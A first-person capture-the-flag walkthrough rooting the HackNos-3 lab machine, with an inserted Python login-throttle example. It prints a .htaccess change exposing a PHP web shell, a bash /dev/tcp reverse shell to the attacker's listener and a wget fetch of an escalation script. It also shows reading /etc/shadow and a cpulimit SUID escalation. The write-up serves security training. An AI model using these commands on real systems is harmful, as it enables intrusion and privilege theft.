CTF-Walkthrough for HackNos-3


Daniel Lowrie here. I decided to try out this capture the flag for fun and I’m taking you along with me. If you want to follow along with me you can find the CTF here. Let’s begin!

It all started by getting the IP of the target, which I did through a simple ping sweep of the network it was on, but you could easily perform a “netdiscover” or “nmap” scan to look for it. Once I had that I was ready to start the initial Recon and Scanning of the target.

I like to start off with an aggressively timed scan of all ports, just to see what’s open…

It looks like we got a webserver on our hands, but let’s throw another nmap scan at it to enumerate a little more…

Not a ton more information about our target from that, but it looks like we’re on the right track.

Since this is a web server I usually run a Nikto scan, so that’s what we’ll do…

Again, not a ton of new info here. We do see a “/scripts” directory with directory indexing enabled, so we’ll just record that in our notes for later. How about we run a directory buster and see if anything new shows up.

Sweet! A couple more directories to check out. The “/scripts” directory didn’t give me a lot to work with, but then again it did allow me to enumerate some technology versions that may or may not be helpful…

Let’s see what’s in the other two directories.

Cool! A web-based ticketing system. I walk around it for a while, run Nikto, run GoBuster, and manually crawl the site. I did find a login page for the agents…

I messed around with this portal for a while, but I got nowhere. Not sure if it was meant to be a troll, or if there is a way to hack it, but I had other areas as yet unexplored, so I moved on to the “/websec” directory.

I run a “cewl” scan to grab any words for a possible password dictionary, as well as to look for email addresses.

We now have an email address. Cewl! (see what I did there ;D )

Let’s see what Nikto can discern.

As you can see there were a couple of items that caught my eye. Maybe that config file has username(s) and/or password(s). Maybe I can then use them to log in to the web portal. Maybe.

I found out something interesting about this site. You have to log in to visit any of the pages and it’s powered by something called “Gila CMS”. The portal only accepts email-format input for the “E-mail” input box. The good news is we have an email address from the cewl scan earlier. We’ll just throw that in there and then proxy the request through Burp Suite, where I can then brute-force the password using Burp’s Intruder module. Access is now but a brute-force attack away! MU-HA-HA-HA-HA-HA!!!

RATS!!! Foiled again! It looks like a WAF or something is blocking rapid POST requests by banning the offending IP for “a minute”. Errrrrr! I tried adjusting the scan timing, but that’s only available with a licensed copy of Burp. OWASP ZAP can throttle the scan, but not enough to keep the WAF or whatever from banning my IP. It looks like manually logging in is in order. The good thing is there are only around 60 entries.
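The “banned for a minute” behaviour that stopped the Intruder run is, from the defender’s side, a per-IP login throttle with a temporary lockout. As an added illustration (my own example here, not code from the original post or from Gila CMS; the thresholds of 5 POSTs per 10 seconds and a 60-second ban are assumed, not taken from the target), here is a small Python version of that control:

```python
"""Per-IP login throttle with a temporary ban.

Added example, not part of the original post or of Gila CMS. The policy
values below are assumptions chosen for illustration."""
import time
from collections import deque

MAX_ATTEMPTS = 5       # assumed: POSTs allowed inside one window
WINDOW_SECONDS = 10.0  # assumed: sliding window length
BAN_SECONDS = 60.0     # assumed: lockout, "a minute" as on the target


class LoginThrottle:
    def __init__(self, max_attempts=MAX_ATTEMPTS, window=WINDOW_SECONDS, ban=BAN_SECONDS):
        self.max_attempts = max_attempts
        self.window = window
        self.ban = ban
        self._attempts = {}      # ip -> deque of attempt timestamps
        self._banned_until = {}  # ip -> timestamp when the ban expires

    def allow(self, ip, now=None):
        """Return (allowed, reason) for one login POST from `ip`."""
        now = time.monotonic() if now is None else now
        until = self._banned_until.get(ip)
        if until is not None:
            if now < until:
                return False, "banned for %.0fs" % (until - now)
            del self._banned_until[ip]  # ban has expired, start fresh
        q = self._attempts.setdefault(ip, deque())
        q.append(now)
        # Drop attempts that have fallen out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) > self.max_attempts:
            self._banned_until[ip] = now + self.ban
            q.clear()
            return False, "rate exceeded, banned for %.0fs" % self.ban
        return True, "ok"


def simulate(timestamps, ip="192.0.2.10", throttle=None):
    """Feed constructed POST timestamps (seconds) and return the allow/deny decisions."""
    throttle = throttle or LoginThrottle()
    return [throttle.allow(ip, now=t)[0] for t in timestamps]


if __name__ == "__main__":
    # Constructed burst: six POSTs one second apart, a retry at 30 s, another at 70 s.
    for t, ok in zip([0, 1, 2, 3, 4, 5, 30, 70], simulate([0, 1, 2, 3, 4, 5, 30, 70])):
        print("t=%3ds %s" % (t, "allowed" if ok else "denied"))
```

A throttle keyed on IP alone is what made the manual attempts in this write-up viable; a production control would also count failures per account and alert on sustained retries.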

After a few tries, I get in with

contact@hacknos.com:Securityx

I then check out the left-side menu.

I am then given the option to create and/or upload a file. I can also edit the files. I try to upload my custom web-shell (https://github.com/daniellowrie/WebShell-v1/blob/master/x.php), but even though I get a “success” message after uploading, the file doesn’t show up in the directory tree.

So I create a file called x.php and copy/paste the PHP code into the file and save, then browse to http://192.168.0.15/websec/x.php

Another roadblock. OK. Let’s look at that “.htaccess” file. It looks like I need to add a line to make the x.php file accessible.

Add and save…

RewriteCond %{REQUEST_URI} !x.php

And now…

Excellent! Now I can throw commands with ease at this app and get a reverse shell. So a little bash magic and we should get a connection at the Netcat listener.

/bin/bash -c '/bin/bash >/dev/tcp/192.168.0.16/9999 0>&1 2>&1 &'

Now a little python magic for a better shell experience.

$ python -c 'import pty; pty.spawn("/bin/bash")'

Next, I use wget to upload my custom Privilege Escalation script (privy.sh https://github.com/daniellowrie/Privy) and see if any low-hanging fruit is ripe for the picking.

In the SUID-GUID.txt file I see something interesting…

I quickly hop over to https://gtfobins.github.io and search for “cpulimit”. (Actually, I searched a few possible binaries first and hit on “cpulimit”)

At this point, I think I’m just 1 command away from rooting this machine, but alas that was not to be the case. It opened the sh shell, but I was still www-data. I was surprised since this was running with SUID as root.

I then spent A LOT of time trying different things. Instead of running /bin/sh I tried all sorts of commands (cp, mv, id, mkdir, cat /etc/shadow) and these did run as root! Yes, you heard me correctly; I could indeed read /etc/shadow! (Just in case you’re wondering I did run the password hashes through johntheripper with rockyou.txt without success).

Because I could run things as root, I was convinced this would lead me to full Priv Esc, but how? OK, think, think, think! I then had an epiphany. If I could set permissions like SUID and Execute, I could change the permissions on another system binary that was a little more friendly to priv esc. I look at a few binaries on GTFOBins and, looking at “bash”, I get hopeful.

From messing around with the “cpulimit” command I had a feeling that this wasn’t going to run “as-is” because the -f option didn’t like other flags and switches or a lot of special characters, so I broke it down and ran each element individually.

Oh, and I also created a directory off of / called “/mydir” to mess with all this.

$ cpulimit -l 100 -f mkdir /mydir
$ cpulimit -l 100 -f chmod 4755 /usr/bin/bash
$ cpulimit -l 100 -f cp /usr/bin/bash /mydir
$ cpulimit -l 100 -f chmod +s /mydir/bash
$ cd /mydir
$ ./bash -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Now I go after the root flag…

I also got the user flag…

All in all, this was a really fun challenge and was just difficult enough to be challenging without making you suffer utter despair. I hope this helps all that are trying to get through this CTF. Thanks to Rahul Gehlaut for creating this CTF!

If you’re interested in security training, check out my courses on CEHv10, PenTest+, and more on ITProTV.